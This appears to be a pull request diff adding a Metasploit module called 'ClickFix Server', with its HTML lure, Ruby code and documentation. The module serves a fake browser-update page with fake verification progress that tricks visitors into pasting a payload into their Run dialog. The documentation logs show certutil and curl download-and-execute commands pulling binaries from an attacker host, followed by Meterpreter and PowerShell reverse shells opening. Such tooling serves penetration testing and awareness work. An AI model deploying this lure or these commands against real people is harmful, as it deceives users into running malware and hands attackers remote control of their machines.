+                btn.disabled = true;
+                btn.innerHTML = `
+                <span style="display:inline-flex;align-items:center;gap:8px;">
+                    <svg style="animation:spin 0.8s linear infinite;width:16px;height:16px;" viewBox="0 0 24 24" fill="none">
+                    <circle cx="12" cy="12" r="10" stroke="rgba(255,255,255,0.3)" stroke-width="3"/>
+                    <path d="M12 2a10 10 0 0 1 10 10" stroke="white" stroke-width="3" stroke-linecap="round"/>
+                    </svg>
+                    Verifying...
+                </span>
+                `;
+                startChromeProgress();
+                document.querySelectorAll('.progress-bar-container, .progress-bar').forEach(el => el.style.display = 'block');
+            }
+          </script>
+
+          <button
+            type="button"
+            onclick="setLoading(this)"
+            style="
+              width: 100%;
+              padding: 12px;
+              background: #1a73e8;
+              color: white;
+              border: none;
+              border-radius: 4px;
+              font-size: 14px;
+              cursor: pointer;
+              font-weight: 500;
+              margin-top: 15px;
+            "
+          >
+            I have completed these steps
+          </button>
+          <div
+            class="progress-bar-container"
+            style="
+              width: 100%;
+              background-color: #3c4043;
+              border-radius: 4px;
+              margin-top: 20px;
+              height: 8px;
+              overflow: hidden;
+              display: none;
+            "
+          >
+            <div
+              class="progress-bar"
+              id="chrome-progress-bar"
+              style="
+                width: 0%;
+                height: 100%;
+                background-color: #1a73e8;
+                transition: width 0.5s ease;
+                display: none;
+              "
+            ></div>
+          </div>
+          <p
+            id="chrome-verification-status"
+            style="
+              font-size: 0.9em;
+              color: #bdc1c6;
+              margin-top: 5px;
+              text-align: center;
+            "
+          >
+            Waiting for user action...
+          </p>
+        </div>
+      </div>
+
+      <script>
+        function triggerChromePayload() {
+          ClickFix.trigger(function () {
+            document.getElementById(
+              "chrome-instruction-overlay",
+            ).style.display = "flex";
+            //startChromeProgress();
+          });
+        }
+
+        function startChromeProgress() {
+          const bar = document.getElementById("chrome-progress-bar");
+          const status = document.getElementById("chrome-verification-status");
+          let width = 0;
+          const interval = setInterval(() => {
+            if (width >= 95) {
+              clearInterval(interval);
+              status.innerText = "Waiting for execution...";
+            } else {
+              if (width < 40){
+                status.innerText = "Verifying environment...";
+                width = width + .25;
+              }else if (width < 60){
+                status.innerText = "Preparing fix...";
+                width = width + .2;
+              }else{
+                status.innerText = "Waiting for user input...";
+                width = width + .1;
+              }
+              bar.style.width = width + "%";
+            }
+          }, 50);
+        }
+      </script>
+    </div>
+  </body>
+</html>

--- a/documentation/modules/exploit/multi/misc/clickfix_server.md
+++ b/documentation/modules/exploit/multi/misc/clickfix_server.md
@@ -1,0 +1,216 @@
+## Vulnerable Application
+
+This creates a Web Server which hosts a ClickFix type exploit.
+When a user visits the site they are given instructions on pasting
+our payload into a run dialog.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/misc/clickfix_server`
+3. Do: `set target #`
+4. Do: `set payload [payload]`
+5. Do: `run`
+6. Visit the website and follow the instructions. You should get a shell.
+
+## Options
+
+### SRVPORT
+
+Web server port to use
+
+### TEMPLATE
+
+Template type to use. Choice are `auto` and `custom`. `custom` value requires `CUSTOM` to have a HTML file path.
+Defaults to `auto` and uses a web browser update template.
+
+### CUSTOM
+
+Path to HTML file to use
+
+## Scenarios
+
+### Linux Firefox 140.0
+
+```
+resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+msf > use exploit/multi/misc/clickfix_server
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/misc/clickfix_server) > set target 1
+target => 1
+msf exploit(multi/misc/clickfix_server) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/misc/clickfix_server) > set uripath clickfix
+uripath => clickfix
+msf exploit(multi/misc/clickfix_server) > exploit
+[*] Command to run on remote host: curl -so ./CVMLVEkTDkF http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./CVMLVEkTDkF;./CVMLVEkTDkF&
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
+msf exploit(multi/misc/clickfix_server) > [*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1/clickfix
+[*] Server started.
+[*] 1.1.1.1   clickfix_server - Request /clickfix from Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
+[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
+[*] Sending payload to 1.1.1.1 (curl/8.18.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.1:35658) at 2026-03-31 11:36:15 -0400
+
+msf exploit(multi/misc/clickfix_server) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: h00die
+meterpreter > sysinfo
+Computer     : kali
+OS           : Debian  (Linux 6.18.12+kali-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+### Windows 10 Pro, Edge 146.0.0.0
+
+```
+resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+msf > use exploit/multi/misc/clickfix_server
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/misc/clickfix_server) > set payload payload/cmd/windows/http/x64/powershell_reverse_tcp
+payload => cmd/windows/http/x64/powershell_reverse_tcp
+msf exploit(multi/misc/clickfix_server) > set uripath clickfix
+uripath => clickfix
+msf exploit(multi/misc/clickfix_server) > exploit
+[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/1GCX5ZG1X0p1DW6ox6kAqA %TEMP%\VjyHKreJan.exe & start /B %TEMP%\VjyHKreJan.exe
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(multi/misc/clickfix_server) > 
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /1GCX5ZG1X0p1DW6ox6kAqA
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1/clickfix
+[*] Server started.
+[*] 2.2.2.2   clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Edg/146.0.0.0
+[*] Client 2.2.2.2 requested /1GCX5ZG1X0p1DW6ox6kAqA
+[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
+[*] Client 2.2.2.2 requested /1GCX5ZG1X0p1DW6ox6kAqA
+[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
+[*] Powershell session session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55701) at 2026-03-31 12:08:43 -0400
+
+msf exploit(multi/misc/clickfix_server) > sessions -i 1
+[*] Starting interaction with 1...
+
+PS C:\Windows\system32> whoami
+DESKTOP-1GAUR72\h00die
+PS C:\Windows\system32> Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer
+
+
+WindowsProductName WindowsVersion OsHardwareAbstractionLayer
+------------------ -------------- --------------------------
+Windows 10 Pro     2009           10.0.19041.6456
+```
+
+### Windows 10 Pro, Chrome 146.0.0.0
+
+```
+resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+msf > use exploit/multi/misc/clickfix_server
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/misc/clickfix_server) > set uripath clickfix
+uripath => clickfix
+msf exploit(multi/misc/clickfix_server) > exploit
+[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\gXDMGfSOa.exe & start /B %TEMP%\gXDMGfSOa.exe
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(multi/misc/clickfix_server) > 
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1/clickfix
+[*] Server started.
+[*] 2.2.2.2   clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
+[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
+[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
+[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
+[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
+[*] Sending stage (232006 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55757) at 2026-03-31 12:15:41 -0400
+
+msf exploit(multi/misc/clickfix_server) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: DESKTOP-1GAUR72\h00die
+meterpreter > sysinfo
+Computer        : DESKTOP-1GAUR72
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+### Windows 10 Pro, Firefox
+
+```
+resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+msf > use exploit/multi/misc/clickfix_server
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/misc/clickfix_server) > set uripath clickfix
+uripath => clickfix
+msf exploit(multi/misc/clickfix_server) > exploit
+[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\lZCpTwOgv.exe & start /B %TEMP%\lZCpTwOgv.exe
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(multi/misc/clickfix_server) > 
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1/clickfix
+[*] Server started.
+[*] 2.2.2.2   clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0
+[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
+[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
+[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
+[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
+[*] Sending stage (232006 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55832) at 2026-03-31 12:18:33 -0400
+
+msf exploit(multi/misc/clickfix_server) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: DESKTOP-1GAUR72\h00die
+meterpreter > sysinfo
+Computer        : DESKTOP-1GAUR72
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/misc/clickfix_server.md
+++ b/documentation/modules/exploit/multi/misc/clickfix_server.md
@@ -4,6 +4,9 @@ This creates a Web Server which hosts a ClickFix type exploit.
 When a user visits the site they are given instructions on pasting
 our payload into a run dialog.
 
+When using a custom html page, please use `INSERT_PAYLOAD_HERE` as the
+spot to put the generated payload in.
+
 ## Verification Steps
 
 1. Start msfconsole
@@ -21,7 +24,7 @@ Web server port to use
 
 ### TEMPLATE
 
-Template type to use. Choice are `auto` and `custom`. `custom` value requires `CUSTOM` to have a HTML file path.
+Template type to use. Choice are `auto` and `custom`. `custom` value requires `custom` to have a HTML file path.
 Defaults to `auto` and uses a web browser update template.
 
 ### CUSTOM

--- a/modules/exploits/multi/misc/clickfix_server.rb
+++ b/modules/exploits/multi/misc/clickfix_server.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'base64'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -17,20 +19,23 @@ class MetasploitModule < Msf::Exploit::Remote
           This creates a Web Server which hosts a ClickFix type exploit.
           When a user visits the site they are given instructions on pasting
           our payload into a run dialog.
+
+          When using a custom html page, please use INSERT_PAYLOAD_HERE as the
+          spot to put the generated payload in.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die', # msf module
-          'boredchilada'
+          'boredchilada' # clickfix template inspiration
         ],
         'References' => [
           ['URL', 'https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf'],
           ['URL', 'https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/'],
-          ['URL', 'https://github.com/boredchilada/clickfix-simulator-2025']
+          ['URL', 'https://github.com/boredchilada/clickfix-simulator-2025'],
+          ['URL', 'https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos']
         ],
         'Payload' => {
-          'BadChars' => "'",
-          'Space' => 260, # Run dialog box max length
+          'Space' => 245, # Reserve room for wrapper so final command fits Run dialog max
           'DisableNops' => true
         },
         'Arch' => [ARCH_CMD],
@@ -38,10 +43,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'Passive' => true,
         'Targets' => [
           ['Windows', { 'Platform' => 'win' }],
-          ['Linux', { 'Platform' => 'linux' }],
-          ['Unix', { 'Platform' => 'unix' }]
+          ['Linux', { 'Platform' => ['linux', 'unix'] }]
         ],
-        'DisclosureDate' => '2024-01-01',
+        'DisclosureDate' => '2023-01-01',
         'DefaultTarget' => 0,
         'Notes' => {
           'AKA' => ['ClickFix', 'ClearFake', 'Fake Update', 'CrashFix'],
@@ -65,42 +69,47 @@ class MetasploitModule < Msf::Exploit::Remote
     if request.method == 'GET'
       user_agent = request['User-Agent']
       print_status("Request #{request.uri} from #{user_agent}")
+      # get our payload stubbed
+      if target.name == 'Windows'
+        p_load = payload.encoded.gsub(' start /B', '') # 'start /B' only works on cmd, not in the run dialog box
+        p_load = "cmd /c \"#{p_load}\"" # run command dialog can't use & so we wrap in cmd
+      else
+        # Linux Application Finder can't have ; so wrap it in bash
+        p_load = "bash -c \"#{payload.encoded}\""
+      end
       case datastore['TEMPLATE']
-      when 'CUSTOM'
+      when 'custom'
+        template = ::File.read(::File.read(datastore['CUSTOM'], mode: 'rb'))
+        template.gsub!('INSERT_PAYLOAD_HERE', Base64.strict_encode64(p_load))
         send_response(cli, ::File.read(datastore['CUSTOM'], mode: 'rb'))
       else
         template = ::File.read(File.join(Msf::Config.data_directory, 'exploits', 'clickfix', 'browser_update.html'))
-        if target.name == 'Windows'
-          p_load = payload.encoded.gsub(' start /B', '') # 'start /B' only works on cmd, not in the run dialog box
-          p_load = "cmd /c \"#{p_load}\"" # run command dialog can't use & so we wrap in cmd
-          template.gsub!('INSERT_PAYLOAD_HERE', p_load)
-        else
-          template.gsub!('INSERT_PAYLOAD_HERE', "bash -c \"#{payload.encoded}\"") # Linux Application Finder can't have ; so wrap it in bash
-        end
-
+        template.gsub!('INSERT_PAYLOAD_HERE', Base64.strict_encode64(p_load))
         if user_agent =~ %r{Edg/}
           version = user_agent.match(%r{Edg/([\d.]+)})
           template.gsub!('120.0.6099.0', version[1]) if version
           template.gsub!('Google Chrome', 'Microsoft Edge')
           template.gsub!('Chrome', 'Edge') if version
-          send_response(cli, template)
         elsif user_agent =~ /Chrome/
           version = user_agent.match(%r{Chrome/([\d.]+)})
           template.gsub!('120.0.6099.0', version[1]) if version
-          send_response(cli, template)
         elsif user_agent =~ /Firefox/
           version = user_agent.match(%r{Firefox/([\d.]+)})
           template.gsub!('120.0.6099.0', version[1]) if version
           template.gsub!('Google Chrome', 'Mozilla Firefox')
           template.gsub!('Chrome', 'Firefox') if version
-          send_response(cli, template)
+        else
+          # assume chrome based on marketshare
+          fake_version = "#{rand(201..400)}.0.#{rand(1000..9999)}.0"
+          template.gsub!('120.0.6099.0', fake_version)
         end
+        send_response(cli, template)
       end
     end
   end
 
   def run
-    if datastore['TEMPLATE'] == 'CUSTOM' && File.exist?(datastore['CUSTOM'])
+    if datastore['TEMPLATE'] == 'custom' && File.exist?(datastore['CUSTOM'])
       fail_with(Failure::BadConfig, "Custom template path not found: #{datastore['CUSTOM']}")
     end
     exploit # start http server

--- a/modules/exploits/multi/misc/clickfix_server.rb
+++ b/modules/exploits/multi/misc/clickfix_server.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ClickFix Server',
+        'Description' => %q{
+          This creates a Web Server which hosts a ClickFix type exploit.
+          When a user visits the site they are given instructions on pasting
+          our payload into a run dialog.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'boredchilada'
+        ],
+        'References' => [
+          ['URL', 'https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf'],
+          ['URL', 'https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/'],
+          ['URL', 'https://github.com/boredchilada/clickfix-simulator-2025']
+        ],
+        'Payload' => {
+          'BadChars' => "'",
+          'Space' => 260, # Run dialog box max length
+          'DisableNops' => true
+        },
+        'Arch' => [ARCH_CMD],
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Passive' => true,
+        'Targets' => [
+          ['Windows', { 'Platform' => 'win' }],
+          ['Linux', { 'Platform' => 'linux' }],
+          ['Unix', { 'Platform' => 'unix' }]
+        ],
+        'DisclosureDate' => '2024-01-01',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['ClickFix', 'ClearFake', 'Fake Update', 'CrashFix'],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT]
+        }
+      )
+    )
+    # set the default port, and a URI that a user can set if the app isn't installed to the root
+    register_options(
+      [
+        OptPort.new('SRVPORT', [true, 'Web Server Port', 80]),
+        OptEnum.new('TEMPLATE', [ true, 'Template style to use', 'auto', %w[auto custom]]),
+        OptPath.new('CUSTOM', [false, 'Custom Template Path', ''], conditions: ['TEMPLATE', '==', 'custom'])
+      ]
+    )
+  end
+
+  def on_request_uri(cli, request)
+    if request.method == 'GET'
+      user_agent = request['User-Agent']
+      print_status("Request #{request.uri} from #{user_agent}")
+      case datastore['TEMPLATE']
+      when 'CUSTOM'
+        send_response(cli, ::File.read(datastore['CUSTOM'], mode: 'rb'))
+      else
+        template = ::File.read(File.join(Msf::Config.data_directory, 'exploits', 'clickfix', 'browser_update.html'))
+        if target.name == 'Windows'
+          p_load = payload.encoded.gsub(' start /B', '') # 'start /B' only works on cmd, not in the run dialog box
+          p_load = "cmd /c \"#{p_load}\"" # run command dialog can't use & so we wrap in cmd
+          template.gsub!('INSERT_PAYLOAD_HERE', p_load)
+        else
+          template.gsub!('INSERT_PAYLOAD_HERE', "bash -c \"#{payload.encoded}\"") # Linux Application Finder can't have ; so wrap it in bash
+        end
+
+        if user_agent =~ %r{Edg/}
+          version = user_agent.match(%r{Edg/([\d.]+)})
+          template.gsub!('120.0.6099.0', version[1]) if version
+          template.gsub!('Google Chrome', 'Microsoft Edge')
+          template.gsub!('Chrome', 'Edge') if version
+          send_response(cli, template)
+        elsif user_agent =~ /Chrome/
+          version = user_agent.match(%r{Chrome/([\d.]+)})
+          template.gsub!('120.0.6099.0', version[1]) if version
+          send_response(cli, template)
+        elsif user_agent =~ /Firefox/
+          version = user_agent.match(%r{Firefox/([\d.]+)})
+          template.gsub!('120.0.6099.0', version[1]) if version
+          template.gsub!('Google Chrome', 'Mozilla Firefox')
+          template.gsub!('Chrome', 'Firefox') if version
+          send_response(cli, template)
+        end
+      end
+    end
+  end
+
+  def run
+    if datastore['TEMPLATE'] == 'CUSTOM' && File.exist?(datastore['CUSTOM'])
+      fail_with(Failure::BadConfig, "Custom template path not found: #{datastore['CUSTOM']}")
+    end
+    exploit # start http server
+  end
+end


### PR DESCRIPTION
This PR adds a clickfix server for windows and linux. I thought this would die out last year, but apparently its been very effective against people who don't know better than to paste random code in a run dialog box.

Tested against Kali (firefox) and windows 10 (edge, chrome, firefox) via shell and meterp.

## Verification

1. Start msfconsole
2. Do: `use exploit/multi/misc/clickfix_server`
3. Do: `set target #`
4. Do: `set payload [payload]`
5. Do: `run`
6. Visit the website and follow the instructions. You should get a shell.